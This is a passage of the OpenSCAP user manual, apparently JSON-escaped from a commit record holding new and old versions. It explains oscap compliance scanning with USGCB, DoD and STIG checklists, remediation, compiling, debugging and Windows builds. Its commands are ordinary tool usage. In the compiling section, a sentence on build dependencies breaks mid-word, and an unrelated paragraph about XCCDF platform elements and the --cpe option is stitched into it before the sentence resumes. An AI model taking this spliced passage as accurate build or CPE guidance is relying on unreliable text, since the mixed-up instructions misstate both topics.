oval-report-1.html usgcb-rhel5desktop-oval.xml.result.xml\n$ oscap oval generate report --output oval-report-2.html http%3A%2F%2Fwww.redhat.com%2Fsecurity%2Fdata%2Foval%2Fcom.redhat.rhsa-all.xml.result.xml\n----\n\nIf you're interested in runing evaluation of the USGCB on a remote machine using\na GUI please see:\nhttps:\/\/open-scap.org\/resources\/documentation\/evaluate-remote-machine-for-usgcb-compliance-with-scap-workbench\/[Evaluate\nRemote Machine for USGCB Compliance with SCAP Workbench] tutorial.\n\n\n=== How to Evaluate Third-Party Guidances\nThe SCAP content repository hosted at {nvd}[National Vulnerability Database]\n(NVD) can be searched for publicly available guidances for a given\nproduct. For example, as per 2013\/05\/11 there are\nhttp:\/\/web.nvd.nist.gov\/view\/ncp\/repository?tier=3&product=Red+Hat+Enterprise+Linux+5[two]\nTier III checklists for Red Hat Enterprise Linux 5. Analogously, the\nMITRE Corp. hosts http:\/\/oval.mitre.org\/rep-data\/[repository] of OVAL\ncontent for various platforms, sorted by versions and classes.\n\nLikewise the USGCB, any downloaded guidance can be evaluated by\nOpenSCAP.\n\n* Examplary evaluation of DoD Consensus Security Configuration Checklist\nfor Red Hat Enterprise Linux 5 (2.0)\n----\n$ wget http:\/\/nvd.nist.gov\/ncp\/DoD-RHEL5-desktop.zip\n$ unzip DoD-RHEL5-desktop.zip\n$ oscap xccdf eval --profile DOD_baseline_1.0.0.1 --cpe dcb-rhel5_cpe-dictionary.xml --results result.xml --oval-results dcb-rhel5_xccdf.xml\n----\n\n* Examplary evaluation of Red Hat 5 STIG Benchmark (Version 1, Release 12)\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ unzip U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ oscap xccdf eval --profile MAC-2_Public --cpe\nU_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml --results result.xml\n--oval-results U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\nFurthermore, any individual file from the archive can be inspected using\nthe `oscap info` command line option. The oscap program does not have\nthe concept of importing SCAP files, therefore it can process any SCAP\nfiles available on the filesystem. That is possible because the SCAP\nstandard files are native file formats of the OpenSCAP.\n\n\n\n=== How to evaluate guidances for Red Hat Enterprise Linux 6\nGuidances for Red Hat Enterprise Linux 6 can be acquired from\n{ssg_git}[SCAP Security Guide\nproject] (SSG). SSG holds currently the most evolved and elaborate SCAP\npolicy for Linux systems. The project provides practical security\nhardening advice for Red Hat products and also links it to compliance\nrequirements in order to ease deployment activities, such as\ncertification and accreditation.\n\nThe project started in 2011 as open collaboration of U.S. Government\nbodies to develop next generation of United States Government Baseline\n(USGCB) available for Red Hat Enterprise Linux 6. There are multiple\nparties contributing to the project from the public sector and private\nsector.\n\nThe SSG project contains baselines for both desktops and servers. See\nhttps:\/\/github.com\/OpenSCAP\/scap-security-guide\n\n\n\n[[devs]]\n== Developer's operations\nThis part of documentation is meant to serve mainly to developers who want to\ncontribute to the ```oscap```, help to fix bugs, or take an advantage of\nthe OpenSCAP library and create own projects on top of it.\n\n[[devs-compiling]]\n=== Compiling\nIf you want to build the ```libopenscap``` library and the ```oscap``` tool from\nthe {oscap_git}[source code] then follow these instructions:\n\n1) Get the lastest source code\n\n $ git clone https:\/\/github.com\/OpenSCAP\/openscap.git\n\n2) Run the follwoing script.\n\n $ .\/autogen.sh\n\nNOTE: The *autoconf*, *automake*, and *libtool* tools are required to be\ninstalled on your system. If you use a release taball, you can skip this step.\n\n3) Run the following commands to build the library.\n\n $ .\/configure\n $ make\n\nBuild dependencies may vary in dependency on enabled f element in its body. This\nelement references a CPE name or CPE2 platform (defined using\ncpe2:platform-specification) that could be defined in a CPE dictionary file or a\nCPE language file; or it can also be embedded directly in the XCCDF document.\n\nAn XCCDF rule can contain multiple *<xccdf:platform>* elements. It is deemed\napplicable if at least one of the listed platforms is applicable. If an XCCDF\nrule contains no *<xccdf:platform>* elements it is considered always applicable.\n\nIf the CPE name or CPE2 platform is defined in an external file, use the\n ```--cpe```\noption; oscap auto-detects format of the file. The following command is an\nexample of the XCCDF content evaluation using CPE name from an external file:\n\neatures (by the configure command). By default, you need the following packages\ninstalled on your system:\n\n\n* swig\n* libxml2-devel\n* rpm-devel\n* libgcrypt-devel\n* pcre-devel\n* python-devel\n* perl-devel\n* libcurl-devel\n* libxslt-devel\n* libtool\n* perl-XML-XPath\n\n. Run library self-checks by executing the following command: # make check\n\n. Run the installation procedure by executing the following command: # make install\n\nIf you want to create a package for Fedora or Red Hat Enterprise Linux\ndistribution, you will need the respective spec files. These spec files are\navailable under the following directories:\n\n* dist\/fedora\n* dist\/rhel5\n* dist\/rhel6\n\n=== Debugging\nDevelopers and users who intend to help find and fix possible bugs in OpenSCAP\nshould follow these instructions on how to enable debugging in OpenSCAP:\n\n==== Debug mode\nThe first and an obvious step is to re-compile library so debug mode is\nenabled.\n\n------------------------------------\n$ .\/configure --enable-debug && make\n------------------------------------\n\nDebug mode provides:\n\n* debug symbols on and optimization off - you can use ```gdb```,\n* logs - ```oscap``` tool will generate *oscap_debug.log.\\{pid}* log files for\nevery process that was run.\n* http:\/\/www.gnu.org\/software\/gawk\/manual\/html_node\/Assert-Function.html[assertions]\nare evaluated.\n\n==== Testing library\nNext important step is to ```preload libopenscap_testing.so``` before you run\n ```oscap``` tool. The testing library allows you to specify custom path to\nprobes via *OVAL_PROBE_DIR* environment variable. The easiest way how to\nachieve that without need to install libopenscap, is to use shell\nscript called *run* in the OpenSCAP directory.\n\n-------------------------------------------------\n$ .\/run utils\/.libs\/oscap xccdf eval ... whatever\n-------------------------------------------------\n\nThe *run* script is generated at configure time and it sets:\n\n* **LD_PRELOAD* and *LD_LIBRARY_PATH* - preload ```libopenscap_testing.so```\n* *OVAL_PROBE_DIR* - path to probes\n* *OSCAP_SCHEMA_PATH* - path to XCCDF, OVAL, CPE, ... schemas. (required\nfor valudation)\n* *OSCAP_XSLT_PATH*- path to XSLT transformations. (required if you want\nto generate html documents from xml)\n\n==== Example\n\n $ .\/run gdb --args utils\/.libs\/oscap xccdf eval --profile hard --results xccdf-results.xml --oval-results my-favourite-xccdf-checklist.xml\n\n\nThe ```--oval-results``` option force ```oscap``` tool to generate OVAL Result file\nfor each OVAL session used for evaluation. It's also very useful for\ndebugging!\n\n==== Debugging probes\nIt's also possible to debug a probe itself. You need to raise timeout\nvalue for thread join in ```src\/OVAL\/probes\/probe\/main.c:228``` and rebuild\nsources.\n\n----------------------------\n- j_tm.tv_sec += 3;\n+ j_tm.tv_sec += 3000;\n----------------------------\n\nThen you can run gdb with probe binary:\n--------------------------------------------------------\n$ .\/run gdb src\/OVAL\/probes\/.libs\/probe_rpmverifypackage\n--------------------------------------------------------\n\nAn input for the probe can be found in ```oscap_debug.log``` created by\nprevious ```oscap``` tool run, e.g.:\n\n----\n (\"seap.msg\" \":id\" 0 ((\"rpmverifypackage_object\" \":id\" \"oval:org.mitre.oval.test:obj:1386\" \":oval_version\" 84541440 ) ((\"name\" \":operation\" 5 \":var_check\" 1 ) \"plymouth\" ) ((\"behaviors\" \":nodeps\" \"false\" \":nodigest\" \"false\" \":noscripts\" \"true\" \":nosignature\" \"false\" ) ) ) )\n----\n\n==== Environment variables\nThere are few more environment variables that control ```oscap``` tool\nbehaviour.\n\n* *OSCAP_FULL_VALIDATION=1* - validate all exported documents (slower)\n* *SEXP_VALIDATE_DISABLE=1* - do not validate SEXP expressions (faster)\n* *OSCAP_DEBUG_FILE=\"foo\"* - name for debug files\n* *OSCAP_DEBUG_LEVEL=2* - set verbosity in debug logs\n** ```1``` for Errors\n** ```2``` for Errors & Warnings\n** ```3``` for Errors & Warnings & Info messages\n\n\n\n=== Scanning with Script Check Engine (SCE)\nThe Script Check Engine (SCE) is an alternative check engine for XCCDF checklist\nevaluation. SCE allows you to call shell scripts out of the XCCDF document.\nThis approach might be suitable for various use cases, mostly when OVAL checks\nare not required. More information about SCE usage is available on this page:\n{sce_web}[Using SCE].\n\nWARNING: SCE is not part of any SCAP specification.\n\n\n=== Building OpenSCAP on Windows\nThe OpenSCAP library is developed mainly on Linux platform but it can be built\nalso on Windows platforms. Follow these instructions to build\nOpenSCAP on Windows using Cygwin:\n\n1. The easiest way to compile OpenSCAP on Windows is in\nhttp:\/\/www.cygwin.com\/[cygwin]. First install basic set of packages from\n*cygwin* distribution plus:\n* *autoconf automake libtool make gcc*\n* *pcre-devel libxml2-devel libcurl-devel libgrcypt-devel*\n* *swig perl python*\n2. Checkout the master branch of OpenSCAP:\n\n $ git clone -b master https:\/\/github.com\/OpenSCAP\/openscap.git\n\n3. Run autotools machinery by\n\n $ .\/autogen.sh\n\n4. Unfortunately the probes support is platform dependent and windows code\nwas not implemented yet so it's necessary to disable compilation of probes by\n\n $ configure --disable-probes\n\n5. Build the library\n\n $ make build\n\n6. You might want to run the library self-check by\n\n $ make check\n\n7. Install the library\n\n $ make install\n\n8. The final DLL is called ```cygopenscap-0.dll``` and you can link you app\nto it.\n\n----------------------------------------------------------------------------------\nExample: gcc myapp.c -I\/path\/to\/headers -L\/path\/to\/dynamic\/library -lcygopenscap-0\n----------------------------------------------------------------------------------\n\nIf you want to run your app, make sure ```cygopenscap-0.dll``` is either in\nworking directory or in PATH variable directories.\n\n=== Generating of code coverage\nCode coverage can be usefull during writing of test or performance profiling. \nWe could separate the process into five phases.\n\n1) *Get dependencies*\n\n # dnf install lcov\n\n2) *Run configure & make*\n\nTo allow code to generate statistics, we need to compile it with specific flags.\n\n $ .\/configure CFLAGS=\"--coverage\" LDFLAGS=-lgcov --enable-debug\n $ make\n\n3) *Run code.*\n\nIn this phase we should run code. We can run it directly or via test suite.\n\n $ .\/run .\/utils\/.libs\/oscap\n\n4) *Generate and browse results*\n\n $ lcov -t \"OpenSCAP coverage\" -o .\/coverage.info -c -d .\n $ genhtml -o .\/coverage .\/coverage.info\n $ xdg-open .\/coverage\/index.html # open results in browser\n\n5) *Clean stats*\n\nEvery run only modify our current statistics and not rewrite them completely.\nIf we want to generate new statistics, we should remove the old ones.\n \n $ lcov --directory .\/ --zerocounters ; find .\/ -name \"*.gcno\" | xargs rm\n $ rm -rf .\/coverage\n\n=== Building OpenSCAP for Windows (cross-compilation)\nBuilding OpenSCAP for Windows without a POSIX emulation layer is currently not\npossible. However, we are close to a native port of OpenSCAP for Windows. If you\nwant to help us solve the remaining problems. Instructions for cross-compiling\nOpenSCAP for Windows:\n\n1) Install the cross-compiler & dependencies\n\n-------------------------------------------------------------\n # yum install mingw32-gcc mingw32-binutils mingw32-libxml2 \\\n mingw32-libgcrypt mingw32-pthreads mingw32-libxslt \\\n mingw32-curl mingw32-pcre \\\n automake autoconf libtool\n-------------------------------------------------------------\n\n2) Checkout the portable branch of the OpenSCAP repository\n\n----------------------------------------------------------------------\n $ git clone -b master https:\/\/github.com\/OpenSCAP\/openscap.git \\\n openscap-portable.git\n $ cd openscap-portable.git\/\n----------------------------------------------------------------------\n\n3) Prepare the build\n\n------------------------------------------------------\n $ .\/autogen.sh\n $ mingw32-configure --disable-probes --disable-python\n------------------------------------------------------\n\n4) Build!\n\n------------------------------\n $ make -k 2> build-errors.log\n------------------------------\n\n5) Inspect build-errors.log for problems\n\n-----------------------------------------------\n $ grep -E '(error:|implicit)' build-errors.log\n-----------------------------------------------\n\n--------------------------------------------------------------------------\noscap_acquire.c:32:17: fatal error: ftw.h: No such file or directory\nrbt_i32.c:36:9: warning: implicit declaration of function 'posix_memalign'\nrbt_i64.c:35:9: warning: implicit declaration of function 'posix_memalign'\nrbt_str.c:39:9: warning: implicit declaration of function 'posix_memalign'\ntailoring.c:200:2: warning: implicit declaration of function 'strverscmp'\noscap-tool.c:37:17: fatal error: ftw.h: No such file or directory\noscap-oval.c:37:17: fatal error: ftw.h: No such file or directory\noscap-info.c:37:26: fatal error: linux\/limits.h: No such file or directory\n--------------------------------------------------------------------------\n\nWe need to solve the following problems:\n\n1. No implementation of ```strverscmp``` for Windows\n2. No implementation of ftw API for Windows\n3. Replace posix_memalign with a Windows API equivalent\n4. Get rid of ```linux\/limits.h``` dependency on Windows\n\nIf you would like to send us a patch solving one of these problems,\nplease consult the page about\nhttp:\/\/open-scap.org\/page\/Contribute[contributing to the OpenSCAP\nproject].\n\n\n=== OpenSCAP Reference Manual\nFor more information about OpenSCAP library, you can refer to this online\nreference manual: http:\/\/static.open-scap.org\/openscap-1.2\/[OpenSCAP\nreference manual]. This manual is included in a release tarball and can be\nregenerated from project sources by Doxygen documentation system.\n\n","old_contents":"= OpenSCAP User Manual\nMichal \u0160ruba\u0159 <msrubar@redhat.com>\nv1.0, 2015-31-08\n:imagesdir: .\/images\n:workbench_url: https:\/\/www.open-scap.org\/tools\/scap-workbench\/\n:sce_web: https:\/\/www.open-scap.org\/features\/other-standards\/sce\/\n:openscap_web: https:\/\/open-scap.org\/\n:oscap_git: https:\/\/github.com\/OpenSCAP\/openscap\n:ssg_git: https:\/\/github.com\/OpenSCAP\/scap-security-guide\n:xmlsec: https:\/\/www.aleksey.com\/xmlsec\/\n:xslt: http:\/\/www.w3.org\/TR\/xslt\n:xsl: http:\/\/www.w3.org\/Style\/XSL\/\n:ssg: http:\/\/open-scap.org\/security-policies\/scap-security-guide\/\n:xccdf: http:\/\/scap.nist.gov\/specifications\/xccdf\/\n:xccdf_1-2: http:\/\/scap.nist.gov\/specifications\/xccdf\/#resource-1.2\n:scap: http:\/\/scap.nist.gov\/\n:nist: http:\/\/www.nist.gov\/\n:cpe: https:\/\/cpe.mitre.org\/\n:cce: https:\/\/cce.mitre.org\/\n:oval: https:\/\/oval.mitre.org\/\n:pci_dss: https:\/\/www.pcisecuritystandards.org\/security_standards\/\n:usgcb: http:\/\/usgcb.nist.gov\/\n:stig: http:\/\/iase.disa.mil\/stigs\/Pages\/index.aspx\n:scap_1-2: http:\/\/scap.nist.gov\/revision\/1.2\/\n:scap_1-1: http:\/\/scap.nist.gov\/revision\/1.1\/index.html\n:scap_1-0: http:\/\/scap.nist.gov\/revision\/1.0\/\n:nvd: https:\/\/web.nvd.nist.gov\/view\/ncp\/repository\n:toc:\n:toc-placement: preamble\n:numbered:\n\nimage::vertical-logo.png[align=\"center\"]\n\ntoc::[]\n\n== Introduction\n\nThis documentation provides information about a command-line tool called\n ```oscap``` and its most common operations. With ```oscap``` you can check\nsecurity configuration settings of a system, and examine the system for signs of\na compromise by using rules based on standards and specifications. The\n ```oscap``` uses {scap}[SCAP] which is a line of specifications maintained by\nthe {nist}[NIST] which was created to provide a standardized approach for\nmaintaining system security. New specifications are governed by NIST's SCAP\nhttp:\/\/scap.nist.gov\/timeline.html[Release cycle] in order to provide a\nconsistent and repeatable revision workflow. The ```oscap``` mainly processes\nthe {xccdf}[XCCDF] which is a standard way of expressing a checklist content and\ndefines security checklists. It also combines with other specifications such as\n{cpe}[CPE], {cce}[CCE] and {oval}[OVAL] to create a SCAP-expressed checklist that\ncan be processed by SCAP-validated products. For more information about the\nSCAP please refer to http:\/\/open-scap.org\/features\/standards\/[SCAP Standards].\n\nThe ```oscap``` tool is a part of the {openscap_web}[OpenSCAP] project. If you're\ninterested in a graphical alternative to this tool please visit\n{workbench_url}[SCAP Workbench] page.\n\n\nWe will use the _scap-security-guide_ {ssg}[SSG] project to provide us the SCAP\ncontent. It provides security policies written in a form of SCAP documents\ncovering many areas of computer security, and it implements security guidances\nrecommended by respected authorities, namely {pci_dss}[PCI DSS], {stig}[STIG], and\n{usgcb}[USGCB].\n\nYou can also generate your own SCAP content if you have an understanding of at least\nXCCDF or OVAL. XCCDF content is also frequently published online under open\nsource licenses, and you can customize this content to suit your needs instead.\nSCAP Workbench is a great tool to do the customization.\n\nThe Basic oscap usage section of the manual presents how to install the tool\nand SCAP content and how to use those to examine a SCAP content, perform a\nconfiguration scan or how to automatically remediate your machines.\n\nThird section provides cover advanced topic like validation, signing and\ntransformation of SCAP content, generating reports and guides and also some\ninformation about CPE applicability.\n\nLast section contains information about debuging and compiling oscap on Linux\nand Windows which can be useful for developers.\n\n== Basic oscap Usage\n\nIf you want to perform configuration or vulnerability scans of a local system\nthen the following must be available:\n\n . A tool (```oscap``` or SCAP Workbench)\n . SCAP content (XCCDF, OVAL...)\n\n=== Installation\n\nYou can either build the OpenSCAP library and the ```oscap``` tool from\n{oscap_git}[source] (for details please refer to the <<devs-compiling,compiling>> section),\nor you can use an existing build for your Linux distribution. Use the\nfollowing yum command if you want to install the oscap tool on your\nFedora or Red Hat Enterprise Linux distribution:\n\n----------------------------\n# yum install openscap-scanner\n----------------------------\n\nNOTE: If the ```openscap-scanner``` is not available install\n ```openscap-utils``` instead.\n\nBefore you can start using the ```oscap``` tool you must have some SCAP content\non your system. You can download it from the respective web site but we\nwill use the SSG project in the following sections. You can build it from the\n{ssg_git}[source] or you can install it using a package management system:\n\n----------------------------\n# yum install scap-security-guide\n----------------------------\n\nThe SCAP content will be installed in *__\/usr\/share\/xml\/scap\/ssg\/content\/__*.\n\nWhen the SCAP content is imported or installed on your system, ```oscap``` can\nprocess the content by specifying the file path to the content. The ```oscap```\nsupports SCAP {scap_1-2}[1.2] and is backward compatible with SCAP\n{scap_1-1}[1.1] and SCAP {scap_1-0}[1.0]. No special treatment is required in\norder to import and process earlier versions of the SCAP content.\n\nTo display the version of oscap, supported specifications, built-in CPE\nnames, and supported OVAL objects, type the following command:\n\n----------\n$ oscap -V\n----------\n\n=== Displaying Information SCAP Content\nOne of the capabilities of ```oscap``` is to display information about the SCAP\ncontents within a file. Running the ```oscap info``` command allows the\nexamination of the internal structure of a SCAP document and displays\ninformation such as the document type, specification version, status, the date\nthe document was published (Generated) and the date the document was copied to\nfile system (Imported). When examining an XCCDF document or a SCAP data stream,\ngenerally, the most useful information is about profiles, checklists, and\nstreams. The following example demonstrates usage of the command:\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\nThe following is a sample output of the command above:\n\n----\nDocument type: Source Data Stream\nImported: 2015-07-13T10:23:11\n\nStream: scap_org.open-scap_datastream_from_xccdf_ssg-rhel7-xccdf-1.2.xml\nGenerated: (null)\nVersion: 1.2\nChecklists:\n\tRef-Id: scap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\n\t\tProfiles:\n\t\t\txccdf_org.ssgproject.content_profile_standard\n\t\t\txccdf_org.ssgproject.content_profile_pci-dss\n\t\t\txccdf_org.ssgproject.content_profile_rht-ccp\n\t\t\txccdf_org.ssgproject.content_profile_common\n\t\t\txccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream\n\t\tReferenced check files:\n\t\t\tssg-rhel7-oval.xml\n\t\t\t\tsystem: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\nChecks:\n\tRef-Id: scap_org.open-scap_cref_ssg-rhel7-oval.xml\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-oval.xml\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-oval.xml\nDictionaries:\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\n----\n\n=== Scanning with OSCAP\nThe main goal of the ```oscap``` tool is to perform configuration and\nvulnerability scans of a local system. Oscap is able to evaluate both\nXCCDF benchmarks and OVAL definitions and generate the appropriate\nresults. Please note that SCAP content can be provided either in a\nsingle file (as an OVAL file or SCAP Data Stream), or as multiple\nseparate XML files. The following examples distinguish between these two\napproaches.\n\n==== OVAL\nThe SCAP document can have a form of a single OVAL file (an OVAL\nDefinition file). The ```oscap``` tool processes the OVAL Definition file\nduring evaluation of OVAL definitions. It collects system\ninformation, evaluates it and generates an OVAL Result file. The result\nof evaluation of each OVAL definition is printed to standard output\nstream. The following examples describe the most common scenarios\ninvolving an OVAL Definition file.\n\n* To evaluate all definitions within the given OVAL Definition file, run\nthe following command:\n----------------------------------------------------------\n$ oscap oval eval --results oval-results.xml scap-oval.xml\n----------------------------------------------------------\nWhere *scap-oval.xml* is the OVAL Definition file and *oval-results.xml*\nis the OVAL Result file.\n\n* The following is an example of evaluating one particular definition\nwithin the given OVAL Definition file:\n----------------------------------------------------------------------------------\n$ oscap oval eval --id oval:rhel:def:1000 --results oval-results.xml scap-oval.xml\n----------------------------------------------------------------------------------\nWhere the OVAL definition being evaluated is defined by the\n*oval:rhel:def:1000* string, *scap-oval.xml* is the OVAL Definition file\nand *oval-results.xml* is the OVAL Result file.\n\n* To evaluate all definitions from the OVAL component that are part of a\nparticular data stream within a SCAP data stream collection, run the\nfollowing command:\n---------------------------------------------------------------------------------------------------\n$ oscap oval eval --datastream-id ds.xml --oval-id xccdf.xml --results oval-results.xml scap-ds.xml\n---------------------------------------------------------------------------------------------------\nWhere *ds.xml* is the given data stream, *xccdf.xml* is an XCCDF file\nspecifying the OVAL component, *oval-results.xml* is the OVAL Result\nfile, and *scap-ds.xml* is a file representing the SCAP data stream\ncollection.\n\n\nWhen the SCAP content is represented by multiple XML files, the OVAL\nDefinition file can be distributed along with the XCCDF file. In such a\nsituation, OVAL Definitions may depend on variables that are exported\nfrom the XCCDF file during the scan, and separate evaluation of the OVAL\ndefinition(s) would produce misleading results. Therefore, any external\nvariables has to be exported to a special file that is used during the\nOVAL definitions evaluation. The following commands are examples of this\nscenario:\n\n----\n$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml\n----\n----\n$ oscap oval eval --variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml --results usgcb-results-oval.xml usgcb-rhel5desktop-oval.xml\n----\nWhere *united_states_government_configuration_baseline* represents a\nprofile in the XCCDF document, *usgcb-rhel5desktop-xccdf.xml* is a file\nspecifying the XCCDF document, *usgcb-rhel5desktop-oval.xml* is the OVAL\nDefinition file, *usgcb-rhel5desktop-oval.xml-0.variables-0.xml* is the\nfile containing exported variables from the XCCDF file, and\n*usgcb-results-oval.xml* is the the OVAL Result file.\n\n==== XCCDF\nWhen evaluating an XCCDF benchmark, ```oscap``` usually processes an XCCDF\nfile, an OVAL file and the CPE dictionary. It performs system\nanalysis and produces XCCDF results based on this analysis. The results\nof the scan do not have to be saved in a separate file but can be\nattached to the XCCDF file. The evaluation result of each XCCDF rule\nwithin an XCCDF checklist is printed to standard output stream. The CVE\nand CCE identifiers associated with the rules are printed as well. The\nfollowing is a sample output for a single XCCDF rule:\n\n----\nTitle Verify permissions on 'group' file\nRule usgcb-rhel5desktop-rule-2.2.3.1.j\nIdent CCE-3967-7\nResult pass\n----\n\nThe CPE dictionary is used to determine whether the content is\napplicable on the target platform or not. Any content that is not\napplicable will result in each relevant XCCDF rule being evaluated to\n\"notapplicable\".\n\nThe following examples show the most common scenarios of XCCDF benchmark\nevaluation:\n\n* To evaluate a specific profile in an XCCDF file run this command:\n\n----\n$ oscap xccdf eval --profile Desktop --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml\n----\n\nWhere *scap-xccdf.xml* is the XCCDF document, *Desktop* is the selected\nprofile from the XCCDF document, *xccdf-results.xml* is a file storing\nthe scan results, and *cpe-dictionary.xml* is the CPE dictionary.\n\n\n* To evaluate a specific XCCDF benchmark that is part of a data stream\nwithin a SCAP data stream collection run the following command:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *ds.xml* is the particular data stream, *xccdf.xml* is ID of\nthe component-ref pointing to the desired XCCDF document, and\n*xccdf-results.xml* is a file containing the scan results.\n\nNOTE: If you omit ```--datastream-id``` on the command line, the first data\nstream from the collection will be used. If you omit ```--xccdf-id```, the\nfirst component from the checklists element will be used. If you omit\nboth, the first data stream that has a component in the checklists\nelement will be used - the first component in its checklists element\nwill be used.\n\n\n* (Alternative, not recommended) To evaluate a specific XCCDF benchmark\nthat is part of a data stream within a SCAP data stream collection run\nthe following command:\n\n--------------------------------------------------------------------------------------\n$ oscap xccdf eval --benchmark-id benchmark_id --results xccdf-results.xml scap-ds.xml\n--------------------------------------------------------------------------------------\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *benchmark_id* is a string matching the \"id\" attribute of\nxccdf:Benchmark containing in a component, and *xccdf-results.xml* is a\nfile containing the scan results.\n\n=== Remediate System\nOpenSCAP allows to automatically remediate systems that have been found in a\nnon-compliant state. For system remediation, an XCCDF file with instructions is\nrequired. The _scap-security-guide_ package constains certain remediation\ninstructions.\n\nSystem remediation consists of the following steps:\n\n . ```oscap``` performs a regular XCCDF evaluation.\n . An assessment of the results is performed by evaluating the OVAL definitions.\n Each rule that has failed is marked as a candidate for remediation.\n . ```oscap``` searches for an appropriate fix element, resolves it, prepares the\n environment, and executes the fix script.\n . Any output of the fix script is captured by ```oscap``` and stored within the\n *rule-result* element. The return value of the fix script is stored as well.\n . Whenever ```oscap``` executes a fix script, it immediatelly evaluates the OVAL\n definition again (to verify that the fix script has been applied correctly).\n During this second run, if the OVAL evaluation returns success, the result of\n the rule is *fixed*, otherwise it is an *error*.\n . Detailed results of the remediation are stored in an output XCCDF file. It\n contains two *TestResult* elements. The first *TestResult* element represents the\n scan prior to the remediation. The second *TestResult* is derived from the first\n one and contains remediation results.\n\nThere are three modes of operation of ```oscap``` with regard to remediation:\nonline, offline, and review.\n\n==== Online Remediation\nOnline remediation executes fix elements at the time of scanning. Evaluation and\nremediation are performed as a part of a single command.\n\nTo enable online remediation, use the ```--remediate``` command-line option. For\nexample, to execute online remediation using the _scap-security-guide_ package,\nrun:\n\n----\n$ oscap xccdf eval --remediate --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\nThe output of this command consists of two sections. The first section shows the\nresult of the scan prior to the remediation, and the second section shows the\nresult of the scan after applying the remediation. The second part can contain\nonly *fixed* and *error* results. The *fixed* result indicates that the scan performed\nafter the remediation passed. The *error* result indicates that even after\napplying the remediation, the evaluation still does not pass.\n\n==== Offline Remediation\nOffline remediation allows you to postpone fix execution. In first step, the\nsystem is only evaluated, and the results are stored in a *TestResult* element in\nan XCCDF file.\n\nIn the second step, ```oscap``` executes the fix scripts and verifies the result. It\nis safe to store the results into the input file, no data will be lost. During\noffline remediation, a new *TestResult* element is created that is based\non the input one and inherits all the data. The newly created *TestResult*\ndiffers only in the *rule-result* elements that have failed. For those,\nremediation is executed.\n\nTo perform offline remediation using the _scap-security-guide_ package, run:\n\n----\n$ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n----\n$ oscap xccdf remediate --results scan-xccdf-results.xml scan-xccdf-results.xml\n----\n\n==== Remediation Review\nThe review mode allows users to store remediation instructions to a file for\nfurther review. The remediation content is not executed during this operation.\nTo generate remediation instructions in the form of a shell script, run:\n\n $ oscap xccdf generate fix --template urn:xccdf:fix:script:sh --profile xccdf_org.ssgproject.content_profile_rht-ccp --output my-remediation-script.sh \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n\n=== Check Engines\nMost XCCDF content uses the OVAL check engine. This is when OVAL\nDefinitions are being evaluated in order to assess a system. Complete\ninformation of an evaluation is recorded in OVAL Results files, as\ndefined by the OVAL specification. By examining these files it's\npossible check what definitions were used for the evaluation and why the\nresults are as they are. Please note these files are not generated\nunless *--oval-results* is used.\n\nSome content may use alternative check engines, for example the\n{sce_web}[SCE] check engine.\n\nResults of rules with a check that requires a check engine not supported\nby OpenSCAP will be reported as *notchecked*. Check contents are not\nread or interpreted in any way unless the check system is known and\nsupported. Following is an evaluation output of an XCCDF with unknown\ncheck system:\n\n--------------------------------------------------------\n$ oscap xccdf eval sds-datastream.xml\n\nTitle Check group file contents\nRule xccdf_org.example_rule_system_authcontent-group\nResult notchecked\n\nTitle Check password file contents\nRule xccdf_org.example_rule_system_authcontent-passwd\nResult notchecked\n\nTitle Check shadow file contents\nRule xccdf_org.example_rule_system_authcontent-shadow\nResult notchecked\n\n...\n--------------------------------------------------------\n\nNOTE: The *notchecked* result is also reported for rules that have no\ncheck implemented. *notchecked* means that there was no check in that\nparticular rule that could be evaluated.\n\n\n==== CVE, CCE and other identifiers\nEach XCCDF Rule can have xccdf:ident elements inside. These elements\nallow the content creator to reference various external identifiers like\nCVE, CCE and others.\n\nWhen scanning, oscap output identifiers of scanned rules regardless of\ntheir results. For example:\n\n------------------------------------------------------------------------\nTitle Ensure Repodata Signature Checking is Not Disabled For Any Repos\nRule rule-2.1.2.3.6.a\nResult pass\n\nTitle Verify user who owns 'shadow' file\nRule rule-2.2.3.1.a\nIdent CCE-3918-0\nResult pass\n\nTitle Verify group who owns 'shadow' file\nRule rule-2.2.3.1.b\nIdent CCE-3988-3\nResult pass\n------------------------------------------------------------------------\n\nAll identifiers (if any) are printed to stdout for each rule. Since\nstandard output doesn't allow for compact identifier metadata to be\ndisplayed, only the identifiers themselves are displayed there.\n\nIdentifiers are also part of the HTML report output. If the identifier\nis a CVE you can click it to display its metadata from the official NVD\ndatabase (requires internet connection). OpenSCAP doesn't provide\nmetadata for other types of identifiers.\n\n==== Bundled CCE data\nOpenSCAP does not provide any static or product bundled CCE data. Thus\nit has no way of displaying the last generated, updated and officially\npublished dates of static or product bundled CCE data because the dates\nare not defined.\n\n\n\n\n== Advanced oscap usage\n\n=== Validating SCAP Content\nBefore you start using a security policy on your systems, you should first\nverify the policy in order to avoid any possible syntax or semantic errors in\nthe policy. The ```oscap``` tool can be used to validate the 